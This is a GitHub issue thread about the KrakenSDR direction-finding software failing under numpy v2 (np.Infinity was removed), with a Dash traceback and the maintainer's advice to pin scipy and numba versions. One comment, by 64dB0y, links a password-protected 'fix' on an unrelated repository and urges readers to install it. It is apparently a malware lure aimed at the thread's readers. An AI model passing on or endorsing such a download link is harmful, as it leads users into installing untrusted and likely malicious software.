krakenrf/krakensdr_doa #145: np.Infinity???

jabowery, 2024-08-28:
`np.Infinity` has not been a supported feature of `numpy` since the move to `v2` yet nowhere do I see a requirement for a `v1` of `numpy`.  As a result, automatic `conda` version alignment pulls in `v2` resulting in an environment that bombs off on the call to `np.Infinity`.  Moreover, my attempt to specify the latest `v1` for `numpy` failed to produce a working environment as it bombs off on:

```
The dash_html_components package is deprecated. Please replace
`import dash_html_components as html` with `from dash import html`

Can't find gpsd - ok if no external gps used
Traceback (most recent call last):
  File "/home/jabowery/krakensdr/krakensdr_doa/_ui/_web_interface/app.py", line 26, in <module>
    from views import main
  File "/home/jabowery/krakensdr/krakensdr_doa/_ui/_web_interface/views/main.py", line 7, in <module>
    dcc.Location(id="url", children="/config", refresh=True),
  File "/home/jabowery/miniforge3/envs/kraken/lib/python3.10/site-packages/dash/development/base_component.py", line 425, in wrapper
    return func(*args, **kwargs)
  File "/home/jabowery/miniforge3/envs/kraken/lib/python3.10/site-packages/dash/dcc/Location.py", line 77, in __init__
    super(Location, self).__init__(**args)
  File "/home/jabowery/miniforge3/envs/kraken/lib/python3.10/site-packages/dash/development/base_component.py", line 143, in __init__
    raise TypeError(
TypeError: The `dcc.Location` component (version 2.17.1) with the ID "url" received an unexpected keyword argument: `children`
Allowed arguments: hash, href, id, pathname, refresh, search

```

64dB0y, 2024-08-29:
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

krakenrf, 2024-08-29:
When you install 

conda install scipy==1.9.3
conda install numba==0.56.4

It should install a compatible version of numpy. Or did something change and this no longer the case?

Are you using the scripts? https://github.com/krakenrf/krakensdr_docs/wiki/09.-VirtualBox,-Docker-Images-and-Install-Scripts#install-scripts

jabowery, 2024-08-29:
About a week ago I tried that install script but that was at the start of my learning curve about configuring coherent sampling with with just 2 rtl-sdr V3 dongles (master-slave clock wired) and it didn't work.  I've tried about every variation on getting software installed to provide coherent samples since then so I'm much better attuned to the ecosystem now.

I'll try again after cleaning out all the prior software and drivers.